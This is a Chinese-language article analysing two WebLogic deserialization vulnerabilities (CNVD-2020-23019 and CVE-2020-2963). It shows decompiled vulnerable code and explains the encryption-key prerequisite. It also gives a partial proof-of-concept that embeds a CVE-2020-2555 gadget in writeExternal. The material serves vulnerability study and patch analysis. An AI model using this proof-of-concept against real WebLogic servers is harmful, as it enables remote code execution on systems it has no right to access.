千家信息网

怎样进行weblogic 反序列化漏洞分析与复现

发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,本篇文章为大家展示了怎样进行weblogic 反序列化漏洞分析与复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。简介这两个洞应该都是5月更新的补丁,分析时候
千家信息网最后更新 2025年01月20日怎样进行weblogic 反序列化漏洞分析与复现

本篇文章为大家展示了怎样进行weblogic 反序列化漏洞分析与复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

简介

这两个洞应该都是5月更新的补丁,分析时候无意中发现的。看了一下漏洞挺简单,就是利用有点苛刻

SOAPInvokeState CNVD-2020-23019

diff 补丁,截图如下

可以很明显的看出,将ObjectInputStream更改为FilterInputStream。在weblogic中,FilterInputStream负责检查反序列化的类种是否存在可以利用的Gadget,而ObjectInputStream不会。并且在类的readObject 方法中,通过T3协议反序列化默认的参数为FilterInputStream,以此来防御反序列化漏洞。

除非类的readObject中乱调用ObjectInputStream,否则是不会产生反序列化漏洞的。

在SOAPInvokeState的readExternal中,我们只要能走入以下的流程即可

if((flags & 1) != 0) {
try {
len = in.readInt();
byte[] bytes = new byte[len];
in.readFully(bytes);
bytes = EncryptionUtil.decrypt(bytes);
ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
ObjectInputStream in2 = new ObjectInputStream(bais);
this.subject = (AuthenticatedSubject)in2.readObject();
} catch (Exception var13) {
(new NonCatalogLogger("WebServices")).warning("Couldn't completely read SOAPInvokeState object", var13);
}

看一下writeExternal方法,被实例化的类中存在subject,就可以让readExternal执行上面的反序列化流程

if(this.subject != null) {
ByteArrayOutputStream var12 = new ByteArrayOutputStream();
ObjectOutputStream var13 = new ObjectOutputStream(var12);
var13.writeObject(this.subject);
var13.flush();
byte[] var5 = var12.toByteArray();
var5 = EncryptionUtil.encrypt(var5);
var1.writeInt(var5.length);
var1.write(var5);
}

当然,还下面问题

加密

在EncryptionUtil.encrypt加密时,会根据Kernel.isServer()为true,才会进行加密,否则返回原数据。 因此加密之前需要调用KernelStatus.setIsServer(true)设置状态为true,或者强行加密。

public static byte[] encrypt(byte[] var0) {
returngetEncryptionService().encryptBytes(var0);
}

weblogic.security.internal.SerializedSystemIni#getExistingEncryptionService中,会读取SerializedSystemIni.dat作为密钥,也就是说,需要认证或者配合文件读取才能利用该漏洞去攻击weblogic

public static EncryptionService getExistingEncryptionService() {
String var0 = DomainDir.getRootDir();
String var1 = var0 + File.separator + "security"+ File.separator + "SerializedSystemIni.dat";
File var2 = new File(var1);
if(!var2.exists()) {
String var3 = var0 + File.separator + "SerializedSystemIni.dat";
File var4 = new File(var3);
if(!var4.exists()) {
returnnull;
}

var1 = var3;
}

SerializedSystemIni var5 = new SerializedSystemIni(var1);
returngetEncryptionService(var5.getTheSalt(), var5.getTheEncryptedSecretKey(), var5.getTheAESEncryptedSecretKey());

POC

魔改一下 writeExternal为下面的代码,再反序列化即可

BadAttributeValueExpException exp = null;
try {
exp = cve_2020_2555.getBadAttributeValueExpException();
} catch (Exception e) {
e.printStackTrace();
}
out2.writeObject(exp);
out2.flush();
byte[] bytes = baos.toByteArray();
bytes = EncryptionUtil.encrypt(bytes);
out.writeInt(bytes.length);
out.write(bytes);
}

}

WlsSSLAdapter CVE-2020-2963

原理一样,详见下面的代码


private Object readEncryptedField(ObjectInputStream in) throws IOException, ClassNotFoundException {
int length = in.readInt();
if(length <= 0) {
returnin.readObject();
} else{
byte[] bytes = new byte[length];
in.readFully(bytes);
bytes = EncryptionUtil.decrypt(bytes);
ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
ObjectInputStream in2 = new ObjectInputStream(bais);
returnin2.readObject();
}
}

上述内容就是怎样进行weblogic 反序列化漏洞分析与复现,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

序列 漏洞 加密 分析 面的 漏洞分析 代码 内容 就是 技能 方法 流程 知识 补丁 明显 简明 苛刻 简明扼要 两个 也就是 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 山西程序软件开发优选企业 开封网络安全系统品牌 管理软件开发工程师是干什么的 互联网出行科技公司经营范围 利用阿里云服务器犯罪 判断数据库中是否有记录 网络安全小标识简体画 邮政的软件开发 提示 启用 安全中心服务器 航天开票软件数据库工具 vb中读取列表框数据库 什么是危害网络安全 化合物吸收值在哪个数据库找 软件开发需求与成本冲突 南京网络技术服务信息推荐 网络安全预案应根据什么原则制定 崇明区本地软件开发要多少钱 全球网络安全十大议题发布 内蒙古软件开发服务优点 星际争霸2服务器哪个好 金融科技公司互联网金融 服务器警告申诉原因英文 工矿企业网络安全管理规定 万方数据库收录检索 word怎么添加数据库域 健康码数据服务器 戴尔服务器安装2012 mcgs上传数据到数据库 临沂市万网网络技术有限公司 网络技术 三级 教程
0